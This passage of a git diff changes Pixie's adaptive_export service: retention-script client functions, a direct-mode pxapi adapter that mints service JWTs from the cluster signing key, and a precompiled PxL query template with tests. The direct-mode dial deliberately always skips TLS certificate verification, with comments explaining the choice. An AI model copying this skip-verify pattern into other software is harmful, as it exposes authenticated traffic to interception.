-// Scripts are expected to be removed separately via DeleteDataRetentionScript.
-func (c *Client) DisableClickHousePlugin(version string) error {
- req := &cloudpb.UpdateRetentionPluginConfigRequest{
- PluginId: clickhousePluginID,
- Enabled: &types.BoolValue{Value: false},
- Version: &types.StringValue{Value: version},
- }
- _, err := c.pluginClient.UpdateRetentionPluginConfig(c.ctx, req)
- return err
-}
-
-func (c *Client) GetPresetScripts() ([]*script.ScriptDefinition, error) {
- resp, err := c.pluginClient.GetRetentionScripts(c.ctx, &cloudpb.GetRetentionScriptsRequest{})
- if err != nil {
- return nil, err
- }
- var l []*script.ScriptDefinition
- for _, s := range resp.Scripts {
- if s.PluginId == clickhousePluginID && s.IsPreset {
- sd, err := c.getScriptDefinition(s)
- if err != nil {
- return nil, err
- }
- l = append(l, sd)
- }
- }
- return l, nil
-}
-
+// GetClusterScripts returns the retention scripts CURRENTLY installed on
+// clusterID. Callers diff the result against their desired script set to
+// decide what to add or delete. The cloud returns scripts for ALL
+// clusters, so the list is filtered to those targeting the caller's
+// clusterID — without that filter, the diff would treat other clusters'
+// scripts as "stale on this cluster" and try to delete them.
func (c *Client) GetClusterScripts(clusterID, clusterName string) ([]*script.Script, error) {
resp, err := c.pluginClient.GetRetentionScripts(c.ctx, &cloudpb.GetRetentionScriptsRequest{})
if err != nil {
@@ -184,31 +187,33 @@ func (c *Client) GetClusterScripts(clusterID, clusterName string) ([]*script.Scr
var l []*script.Script
for _, s := range resp.Scripts {
if s.PluginId == clickhousePluginID {
+ clusterIDs := make([]string, 0, len(s.ClusterIDs))
+ // Empty clusterID = no filter (legacy callers; rare).
+ match := clusterID == ""
+ for _, id := range s.ClusterIDs {
+ idStr := utils.ProtoToUUIDStr(id)
+ clusterIDs = append(clusterIDs, idStr)
+ if idStr == clusterID {
+ match = true
+ }
+ }
+ if !match {
+ continue
+ }
sd, err := c.getScriptDefinition(s)
if err != nil {
return nil, err
}
l = append(l, &script.Script{
ScriptDefinition: *sd,
- ScriptId: utils.ProtoToUUIDStr(s.ScriptID),
- ClusterIds: getClusterIDsAsString(s.ClusterIDs),
+ ScriptID: utils.ProtoToUUIDStr(s.ScriptID),
+ ClusterIds: strings.Join(clusterIDs, ","),
})
}
}
return l, nil
}
-func getClusterIDsAsString(clusterIDs []*uuidpb.UUID) string {
- scriptClusterID := ""
- for i, id := range clusterIDs {
- if i > 0 {
- scriptClusterID = scriptClusterID + ","
- }
- scriptClusterID = scriptClusterID + utils.ProtoToUUIDStr(id)
- }
- return scriptClusterID
-}
-
func (c *Client) getScriptDefinition(s *cloudpb.RetentionScript) (*script.ScriptDefinition, error) {
resp, err := c.pluginClient.GetRetentionScript(c.ctx, &cloudpb.GetRetentionScriptRequest{ID: s.ScriptID})
if err != nil {
@@ -223,6 +228,19 @@ func (c *Client) getScriptDefinition(s *cloudpb.RetentionScript) (*script.Script
}, nil
}
+// DeleteDataRetentionScript removes the script with the given UUID.
+// Used by INSTALL_PRESET_SCRIPTS to purge stale scripts that target
+// tables no longer in the schema.
+func (c *Client) DeleteDataRetentionScript(scriptID string) error {
+ req := &cloudpb.DeleteRetentionScriptRequest{
+ ID: utils.ProtoFromUUIDStrOrNil(scriptID),
+ }
+ _, err := c.pluginClient.DeleteRetentionScript(c.ctx, req)
+ return err
+}
+
+// AddDataRetentionScript creates a new retention script on clusterID,
+// running every frequencyS seconds with the given PxL contents.
func (c *Client) AddDataRetentionScript(clusterID string, scriptName string, description string, frequencyS int64, contents string) error {
req := &cloudpb.CreateRetentionScriptRequest{
ScriptName: scriptName,
@@ -236,24 +254,32 @@ func (c *Client) AddDataRetentionScript(clusterID string, scriptName string, des
return err
}
-func (c *Client) UpdateDataRetentionScript(clusterID string, scriptID string, scriptName string, description string, frequencyS int64, contents string) error {
- req := &cloudpb.UpdateRetentionScriptRequest{
- ID: utils.ProtoFromUUIDStrOrNil(scriptID),
- ScriptName: &types.StringValue{Value: scriptName},
- Description: &types.StringValue{Value: description},
- Enabled: &types.BoolValue{Value: true},
- FrequencyS: &types.Int64Value{Value: frequencyS},
- Contents: &types.StringValue{Value: contents},
- ClusterIDs: []*uuidpb.UUID{utils.ProtoFromUUIDStrOrNil(clusterID)},
+// EnsureClickHousePluginEnabled is the boot-time idempotent op the
+// operator calls in main.go. If the plugin is already enabled with a
+// non-empty ExportURL, no-op. Otherwise, enable it with the supplied
+// fallback URL. Returns the resolved ExportURL for diagnostics.
+func (c *Client) EnsureClickHousePluginEnabled(fallbackExportURL string) (string, error) {
+ plugin, err := c.GetClickHousePlugin()
+ if err != nil {
+ return "", err
}
- _, err := c.pluginClient.UpdateRetentionScript(c.ctx, req)
- return err
-}
-
-func (c *Client) DeleteDataRetentionScript(scriptID string) error {
- req := &cloudpb.DeleteRetentionScriptRequest{
- ID: utils.ProtoFromUUIDStrOrNil(scriptID),
+ if plugin.RetentionEnabled {
+ cfg, err := c.GetClickHousePluginConfig()
+ if err != nil {
+ return "", err
+ }
+ if cfg.ExportURL != "" {
+ return cfg.ExportURL, nil
+ }
}
- _, err := c.pluginClient.DeleteRetentionScript(c.ctx, req)
- return err
+ if fallbackExportURL == "" {
+ return "", fmt.Errorf("pixie: plugin not enabled and no fallback ExportURL provided")
+ }
+ if err := c.EnableClickHousePlugin(
+ &ClickHousePluginConfig{ExportURL: fallbackExportURL},
+ plugin.LatestVersion,
+ ); err != nil {
+ return "", err
+ }
+ return fallbackExportURL, nil
}
diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel b/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel
new file mode 100644
index 00000000000..3cf661a2c79
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel
@@ -0,0 +1,38 @@
+load("@px//bazel:pl_build_system.bzl", "pl_go_test")
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+
+go_library(
+ name = "pixieapi",
+ srcs = ["pixieapi.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixieapi",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/api/go/pxapi",
+ "//src/api/go/pxapi/errdefs",
+ "//src/api/go/pxapi/types",
+ "//src/shared/services/utils",
+ ],
+)
+
+pl_go_test(
+ name = "pixieapi_test",
+ srcs = ["pixieapi_test.go"],
+ embed = [":pixieapi"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go
new file mode 100644
index 00000000000..61c8bef283f
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go
@@ -0,0 +1,223 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package pixieapi adapts pxapi to a flat-row Pixie interface for the
+// controller. Use when the operator (not the cloud's retention plugin)
+// is the writer of pixie observation rows — necessary on deployments
+// where the cloud can't reach an internal ClickHouse endpoint.
+package pixieapi
+
+import (
+ "context"
+ "errors"
+ "fmt"
+ "os"
+ "sync"
+
+ "px.dev/pixie/src/api/go/pxapi"
+ "px.dev/pixie/src/api/go/pxapi/errdefs"
+ "px.dev/pixie/src/api/go/pxapi/types"
+ jwtutils "px.dev/pixie/src/shared/services/utils"
+)
+
+// Row is a flat per-pixie-row map[col]any. Compatible with sink's
+// per-row JSONEachRow encoder.
+type Row map[string]any
+
+// Adapter executes PxL via pxapi and returns flat rows.
+type Adapter struct {
+ client *pxapi.Client
+ clusterID string
+ // directOpts, when non-nil, makes Query rebuild a pxapi.Client per
+ // call with a freshly-minted service JWT in WithBearerAuth. Used
+ // for direct-mode (in-cluster vizier-query-broker), where the cloud
+ // passthrough proxy is bypassed entirely. JWTs are minted fresh
+ // because GenerateJWTForService produces 10-minute claims and we
+ // want each fan-out window to carry its own valid token.
+ directOpts *DirectOptions
+}
+
+// DirectOptions configures direct-mode connection to vizier in-cluster.
+// Use when the cloud's passthrough proxy can't authorize the operator's
+// API key (e.g. self-hosted clouds where API keys are scoped per-cluster
+// and a freshly-deployed cluster isn't yet linked to the key's owner).
+type DirectOptions struct {
+ // VizierAddr is the in-cluster gRPC endpoint, typically
+ // "vizier-query-broker-svc.pl.svc.cluster.local:50300".
+ VizierAddr string
+ // SigningKey is the cluster's JWT signing key, mounted from
+ // pl-cluster-secrets/jwt-signing-key.
+ SigningKey string
+ // ServiceID is the issuer-side service identifier (claim "sub").
+ // Defaults to "adaptive_export" if empty.
+ ServiceID string
+}
+
+// New constructs an Adapter wired to the cluster's vizier via cloud passthrough.
+func New(client *pxapi.Client, clusterID string) *Adapter {
+ return &Adapter{client: client, clusterID: clusterID}
+}
+
+// NewDirect constructs an Adapter that bypasses the pixie cloud and
+// connects directly to the in-cluster vizier-query-broker. Each Query
+// call rebuilds the gRPC client with a fresh service JWT.
+//
+// TLS: direct dial uses pxapi.WithDirectTLSSkipVerify() (added in
+// PR #49 b523ce362 for the same node-IP-dial scenario PEM
+// direct-query needs). That option always skips certificate
+// verification instead of gating the skip on PX_DISABLE_TLS and on the
+// addr containing "cluster.local". The AE operator always targets
+// cluster-internal vizier with a self-signed CA we don't have a clean
+// way to mount, so the always-skip semantics match the deployment shape
+// and remove the brittle env coupling. CodeRabbit r3379377607.
+func NewDirect(clusterID string, opts DirectOptions) (*Adapter, error) {
+ if opts.ServiceID == "" {
+ opts.ServiceID = "adaptive_export"
+ }
+ return &Adapter{clusterID: clusterID, directOpts: &opts}, nil
+}
+
+// NewDirectFromEnv builds a direct-mode Adapter from the runtime env.
+// Reads ADAPTIVE_VIZIER_DIRECT_ADDR for the broker addr and
+// PL_JWT_SIGNING_KEY for the signing key (matching kelvin/metadata
+// pod env conventions). Returns an error if either is missing.
+func NewDirectFromEnv(clusterID string) (*Adapter, error) {
+ addr := os.Getenv("ADAPTIVE_VIZIER_DIRECT_ADDR")
+ if addr == "" {
+ return nil, errors.New("pixieapi: ADAPTIVE_VIZIER_DIRECT_ADDR not set")
+ }
+ sk := os.Getenv("PL_JWT_SIGNING_KEY")
+ if sk == "" {
+ return nil, errors.New("pixieapi: PL_JWT_SIGNING_KEY not set (mount pl-cluster-secrets/jwt-signing-key)")
+ }
+ // NewDirect only applies the ServiceID default. No PX_DISABLE_TLS /
+ // cluster.local precondition is checked on either entry point: Query
+ // dials with pxapi.WithDirectTLSSkipVerify (see NewDirect's doc).
+ return NewDirect(clusterID, DirectOptions{VizierAddr: addr, SigningKey: sk})
+}
+
+// Query executes pxl on the configured cluster and aggregates every
+// emitted record from every table into one []Row.
+func (a *Adapter) Query(ctx context.Context, pxl string) ([]Row, error) {
+ client := a.client
+ if a.directOpts != nil {
+ // Direct mode: build fresh client + fresh service JWT for each
+ // query. JWT is 10-min; fan-out is seconds, so this is safe.
+ jwt, err := jwtutils.SignJWTClaims(
+ jwtutils.GenerateJWTForService(a.directOpts.ServiceID, "vizier"),
+ a.directOpts.SigningKey,
+ )
+ if err != nil {
+ return nil, fmt.Errorf("pixieapi: sign JWT: %w", err)
+ }
+ // pxapi.Client doesn't expose a Close — its grpc.ClientConn is
+ // unexported. We accept GC-time reclamation: a Query in direct
+ // mode runs once per anomaly window per refresh interval (≥30s
+ // in production), so the per-query connection-leak rate is
+ // bounded and matched by goroutine + JWT expiry every ~10min.
+ // If we ever build a high-throughput direct-mode path, swap to
+ // a long-lived client + JWT-refresh ticker instead.
+ c, err := pxapi.NewClient(ctx,
+ pxapi.WithCloudAddr(a.directOpts.VizierAddr),
+ pxapi.WithDirectTLSSkipVerify(),
+ pxapi.WithBearerAuth(jwt),
+ )
+ if err != nil {
+ return nil, fmt.Errorf("pixieapi: direct dial: %w", err)
+ }
+ client = c
+ }
+ vz, err := client.NewVizierClient(ctx, a.clusterID)
+ if err != nil {
+ return nil, fmt.Errorf("pixieapi: vizier dial: %w", err)
+ }
+ mux := newCollector()
+ rs, err := vz.ExecuteScript(ctx, pxl, mux)
+ if err != nil {
+ return nil, fmt.Errorf("pixieapi: ExecuteScript: %w", err)
+ }
+ defer rs.Close()
+ if err := rs.Stream(); err != nil {
+ if errdefs.IsCompilationError(err) {
+ return nil, fmt.Errorf("pixieapi: PxL compilation: %w", err)
+ }
+ return nil, fmt.Errorf("pixieapi: stream: %w", err)
+ }
+ return mux.rows(), nil
+}
+
+type collector struct {
+ mu sync.Mutex
+ all []Row
+}
+
+func newCollector() *collector { return &collector{} }
+
+func (c *collector) AcceptTable(_ context.Context, _ types.TableMetadata) (pxapi.TableRecordHandler, error) {
+ return &tableHandler{out: c}, nil
+}
+
+func (c *collector) rows() []Row {
+ c.mu.Lock()
+ defer c.mu.Unlock()
+ return append([]Row(nil), c.all...)
+}
+
+type tableHandler struct {
+ out *collector
+ meta types.TableMetadata
+}
+
+func (h *tableHandler) HandleInit(_ context.Context, md types.TableMetadata) error {
+ h.meta = md
+ return nil
+}
+
+func (h *tableHandler) HandleRecord(_ context.Context, rec *types.Record) error {
+ row := make(Row, len(h.meta.ColInfo))
+ for _, col := range h.meta.ColInfo {
+ datum := rec.GetDatum(col.Name)
+ if datum == nil {
+ continue
+ }
+ row[col.Name] = datumValue(datum)
+ }
+ h.out.mu.Lock()
+ h.out.all = append(h.out.all, row)
+ h.out.mu.Unlock()
+ return nil
+}
+
+func (h *tableHandler) HandleDone(_ context.Context) error { return nil }
+
+func datumValue(d types.Datum) any {
+ switch v := d.(type) {
+ case *types.BooleanValue:
+ return v.Value()
+ case *types.Int64Value:
+ return v.Value()
+ case *types.Float64Value:
+ return v.Value()
+ case *types.StringValue:
+ return v.Value()
+ case *types.Time64NSValue:
+ return v.Value()
+ case *types.UInt128Value:
+ return v.Value()
+ default:
+ return d.String()
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi_test.go b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi_test.go
new file mode 100644
index 00000000000..a664f8b245b
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi_test.go
@@ -0,0 +1,101 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pixieapi
+
+import (
+ "os"
+ "testing"
+)
+
+// The direct-mode constructors are the #36 broker-direct entry points (AE bypasses
+// the cloud passthrough → immune to the "cluster is not in a healthy state" gate).
+// The env guards (missing broker addr / missing signing key) are what surface a
+// misconfigured operator at construction instead of at first Query, so they must hold.
+
+func clearDirectEnv(t *testing.T) {
+ t.Helper()
+ for _, k := range []string{"ADAPTIVE_VIZIER_DIRECT_ADDR", "PL_JWT_SIGNING_KEY", "PX_DISABLE_TLS"} {
+ t.Setenv(k, "") // t.Setenv records + restores; "" then Unsetenv for a clean slate
+ os.Unsetenv(k)
+ }
+}
+
+func TestNewDirectFromEnv_MissingAddr(t *testing.T) {
+ clearDirectEnv(t)
+ if _, err := NewDirectFromEnv("cid"); err == nil {
+ t.Fatal("expected error when ADAPTIVE_VIZIER_DIRECT_ADDR is unset")
+ }
+}
+
+func TestNewDirectFromEnv_MissingSigningKey(t *testing.T) {
+ clearDirectEnv(t)
+ t.Setenv("ADAPTIVE_VIZIER_DIRECT_ADDR", "vizier-query-broker-svc.pl.svc.cluster.local:50300")
+ if _, err := NewDirectFromEnv("cid"); err == nil {
+ t.Fatal("expected error when PL_JWT_SIGNING_KEY is unset")
+ }
+}
+
+// TestNewDirect_NoEnvGate — direct dial now uses pxapi.WithDirectTLSSkipVerify
+// (PR #49 b523ce362), which doesn't read PX_DISABLE_TLS at all. NewDirect
+// must therefore accept any addr regardless of env.
+func TestNewDirect_NoEnvGate(t *testing.T) {
+ clearDirectEnv(t)
+ for _, addr := range []string{
+ "vizier-query-broker-svc.pl.svc.cluster.local:50300",
+ "vizier.example:50300",
+ "10.42.0.5:50300",
+ } {
+ a, err := NewDirect("cid", DirectOptions{VizierAddr: addr, SigningKey: "k"})
+ if err != nil {
+ t.Fatalf("NewDirect(%q): %v", addr, err)
+ }
+ if a.directOpts == nil {
+ t.Fatalf("direct-mode Adapter must carry directOpts (so Query takes the broker path)")
+ }
+ if a.client != nil {
+ t.Error("direct-mode Adapter must NOT hold a cloud client (it dials per-query)")
+ }
+ if a.directOpts.ServiceID != "adaptive_export" {
+ t.Errorf("ServiceID should default to adaptive_export, got %q", a.directOpts.ServiceID)
+ }
+ }
+}
+
+func TestNewDirectFromEnv_Success(t *testing.T) {
+ clearDirectEnv(t)
+ t.Setenv("ADAPTIVE_VIZIER_DIRECT_ADDR", "vizier-query-broker-svc.pl.svc.cluster.local:50300")
+ t.Setenv("PL_JWT_SIGNING_KEY", "signing-key")
+ t.Setenv("PX_DISABLE_TLS", "1")
+ a, err := NewDirectFromEnv("cluster-123")
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if a.directOpts == nil || a.clusterID != "cluster-123" {
+ t.Fatalf("expected direct Adapter for cluster-123, got %+v", a)
+ }
+ if a.directOpts.VizierAddr == "" || a.directOpts.SigningKey != "signing-key" {
+ t.Errorf("directOpts not populated from env: %+v", a.directOpts)
+ }
+}
+
+// New (cloud) path stays cloud — sanity that the two constructors don't cross-wire.
+func TestNewCloudHasNoDirectOpts(t *testing.T) {
+ a := New(nil, "cid")
+ if a.directOpts != nil {
+ t.Error("cloud Adapter must not have directOpts")
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel b/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel
index 80afa3f2875..606898d6eaf 100644
--- a/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel
+++ b/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel
@@ -15,16 +15,32 @@
# SPDX-License-Identifier: Apache-2.0
load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
go_library(
name = "pxl",
- srcs = ["pxl.go"],
+ srcs = [
+ "compile.go",
+ "queryfor.go",
+ "tables.go",
+ ],
importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl",
visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
deps = [
- "//src/api/go/pxapi",
- "//src/api/go/pxapi/errdefs",
- "//src/api/go/pxapi/types",
- "@com_github_sirupsen_logrus//:logrus",
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ ],
+)
+
+pl_go_test(
+ name = "pxl_test",
+ srcs = [
+ "compile_test.go",
+ "queryfor_bench_test.go",
+ "queryfor_test.go",
+ "tables_test.go",
+ ],
+ embed = [":pxl"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
],
)
diff --git a/src/vizier/services/adaptive_export/internal/pxl/compile.go b/src/vizier/services/adaptive_export/internal/pxl/compile.go
new file mode 100644
index 00000000000..de3d16d0aad
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/compile.go
@@ -0,0 +1,74 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pxl
+
+import (
+ "fmt"
+ "strconv"
+ "strings"
+ "time"
+)
+
+// CompilePassthrough returns a precompiled PxL TEMPLATE for a firehose
+// (empty-Target) pull of `table` over a fixed rolling `window`. The result
+// is identical to QueryFor with an empty anomaly.Target EXCEPT the two
+// precise time_ bounds are left as `%d` verbs (lower, upper — both
+// UnixNano), to be rendered per tick with Render / fmt.Sprintf.
+//
+// Why a template instead of calling QueryFor every tick:
+// - QueryFor takes `now` and derives the relative `start_time=` bound from
+// `now - sliceStart`. For passthrough that delta is ALWAYS `window`, so
+// the relative bound is constant across ticks and can be baked in once.
+// - The script body (DataFrame, upid_to_namespace/pod, display) never
+// changes, so it is compiled once at loop construction rather than
+// re-resolved on every refresh.
+//
+// Only the two post-filter bounds vary per tick, so the rendered string is
+// byte-identical to what QueryFor would have produced for the same window —
+// the precompiled path is a pure performance/structure change, not a
+// behavioural one. upid→namespace/pod resolution stays in PxL (unchanged).
+func CompilePassthrough(table string, window time.Duration) (string, error) {
+ if !IsBuiltin(table) {
+ return "", fmt.Errorf("%w: %q", ErrUnknownTable, table)
+ }
+ // Mirror QueryFor's pad: covers the full window plus a 30s safety
+ // margin, clamped to a 30s floor.
+ pad := window + 30*time.Second
+ if pad < 30*time.Second {
+ pad = 30 * time.Second
+ }
+ relStart := "-" + strconv.FormatInt(int64(pad/time.Second), 10) + "s"
+
+ // Builtin table names never contain '%', so embedding them around the
+ // two `%d` verbs is Sprintf-safe.
+ var b strings.Builder
+ b.WriteString(pxSetMaxRows)
+ b.WriteString("import px\n")
+ b.WriteString("df = px.DataFrame(table='" + table + "', start_time='" + relStart + "')\n")
+ b.WriteString("df = df[df.time_ >= px.int64_to_time(%d)]\n")
+ b.WriteString("df = df[df.time_ < px.int64_to_time(%d)]\n")
+ b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n")
+ b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n")
+ b.WriteString("px.display(df, '" + table + "')\n")
+ return b.String(), nil
+}
+
+// Render fills a CompilePassthrough template with the precise [sliceStart,
+// sliceEnd) bounds for one tick.
+func Render(tmpl string, sliceStart, sliceEnd time.Time) string {
+ return fmt.Sprintf(tmpl, sliceStart.UnixNano(), sliceEnd.UnixNano())
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/compile_test.go b/src/vizier/services/adaptive_export/internal/pxl/compile_test.go
new file mode 100644
index 00000000000..724e12e827c
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/compile_test.go
@@ -0,0 +1,88 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pxl
+
+import (
+ "errors"
+ "strings"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// TestCompilePassthrough_MatchesQueryFor is the behaviour-preservation
+// proof: rendering a precompiled template for a window must produce the
+// EXACT bytes QueryFor emits for an empty Target over that same window.
+// If this holds, the compiled firehose path is a pure structural change —
+// it cannot capture differently than the legacy path it replaces.
+func TestCompilePassthrough_MatchesQueryFor(t *testing.T) {
+ window := 3 * time.Minute
+ // Fixed instant so UnixNano bounds are deterministic.
+ now := time.Unix(1778339984, 0).UTC()
+ sliceStart := now.Add(-window)
+ sliceEnd := now
+
+ legacy, err := QueryFor("http_events", anomaly.Target{}, sliceStart, sliceEnd, now)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ tmpl, err := CompilePassthrough("http_events", window)
+ if err != nil {
+ t.Fatalf("CompilePassthrough: %v", err)
+ }
+ got := Render(tmpl, sliceStart, sliceEnd)
+ if got != legacy {
+ t.Fatalf("rendered template != QueryFor\n--- compiled ---\n%s\n--- legacy ---\n%s", got, legacy)
+ }
+}
+
+// TestCompilePassthrough_Shape pins the essential tokens so an accidental
+// edit to the template (dropped time bound, lost upid resolution) fails
+// loudly even without the byte-equality oracle above.
+func TestCompilePassthrough_Shape(t *testing.T) {
+ tmpl, err := CompilePassthrough("dns_events", 60*time.Second)
+ if err != nil {
+ t.Fatalf("CompilePassthrough: %v", err)
+ }
+ for _, want := range []string{
+ "#px:set max_output_rows_per_table=1000000", // raise Pixie 10k cap
+ "px.DataFrame(table='dns_events', start_time='-90s')", // window 60s + 30s pad
+ "df.time_ >= px.int64_to_time(%d)",
+ "df.time_ < px.int64_to_time(%d)",
+ "px.upid_to_namespace(df.upid)",
+ "px.upid_to_pod_name(df.upid)",
+ "px.display(df, 'dns_events')",
+ } {
+ if !strings.Contains(tmpl, want) {
+ t.Errorf("template missing %q:\n%s", want, tmpl)
+ }
+ }
+ // Exactly two %d verbs (the two time bounds) — nothing else parameterized.
+ if n := strings.Count(tmpl, "%d"); n != 2 {
+ t.Errorf("template has %d %%d verbs, want 2:\n%s", n, tmpl)
+ }
+}
+
+// TestCompilePassthrough_UnknownTable rejects non-builtin tables, matching
+// QueryFor's contract.
+func TestCompilePassthrough_UnknownTable(t *testing.T) {
+ _, err := CompilePassthrough("not_a_table", time.Second)
+ if !errors.Is(err, ErrUnknownTable) {
+ t.Fatalf("err=%v want ErrUnknownTable", err)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/pxl.go b/src/vizier/services/adaptive_export/internal/pxl/pxl.go
deleted file mode 100644
index e4e27a40b6b..00000000000
--- a/src/vizier/services/adaptive_export/internal/pxl/pxl.go
+++ /dev/null
@@ -1,80 +0,0 @@
-// Copyright 2018- The Pixie Authors.
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-//
-// SPDX-License-Identifier: Apache-2.0
-
-package pxl
-
-import (
- "context"
- "fmt"
-
- log "github.com/sirupsen/logrus"
- "px.dev/pixie/src/api/go/pxapi"
- "px.dev/pixie/src/api/go/pxapi/errdefs"
- "px.dev/pixie/src/api/go/pxapi/types"
-)
-
-// recordCounter counts the number of records received
-type recordCounter struct {
- count int
-}
-
-func (r *recordCounter) HandleInit(ctx context.Context, metadata types.TableMetadata) error {
- return nil
-}
-
-func (r *recordCounter) HandleRecord(ctx context.Context, record *types.Record) error {
- r.count++
- return nil
-}
-
-func (r *recordCounter) HandleDone(ctx context.Context) error {
- return nil
-}
-
-type recordCounterMux struct {
- counter *recordCounter
-}
-
-func (m *recordCounterMux) AcceptTable(ctx context.Context, metadata types.TableMetadata) (pxapi.TableRecordHandler, error) {
- return m.counter, nil
-}
-
-// ExecuteScript executes a PxL script and returns the number of records returned
-func ExecuteScript(ctx context.Context, client *pxapi.Client, clusterID string, pxl string) (int, error) {
- vz, err := client.NewVizierClient(ctx, clusterID)
- if err != nil {
- return 0, fmt.Errorf("failed to create vizier client: %w", err)
- }
-
- counter := &recordCounter{}
- tm := &recordCounterMux{counter: counter}
-
- resultSet, err := vz.ExecuteScript(ctx, pxl, tm)
- if err != nil {
- return 0, fmt.Errorf("failed to execute script: %w", err)
- }
- defer resultSet.Close()
-
- if err := resultSet.Stream(); err != nil {
- if errdefs.IsCompilationError(err) {
- return 0, fmt.Errorf("PxL compilation error: %w", err)
- }
- return 0, fmt.Errorf("error streaming results: %w", err)
- }
-
- log.Debugf("Script execution time: %v, bytes received: %v", resultSet.Stats().ExecutionTime, resultSet.Stats().TotalBytes)
- return counter.count, nil
-}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor.go
new file mode 100644
index 00000000000..168c54a4722
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor.go
@@ -0,0 +1,114 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pxl
+
+import (
+ "errors"
+ "fmt"
+ "regexp"
+ "strconv"
+ "strings"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
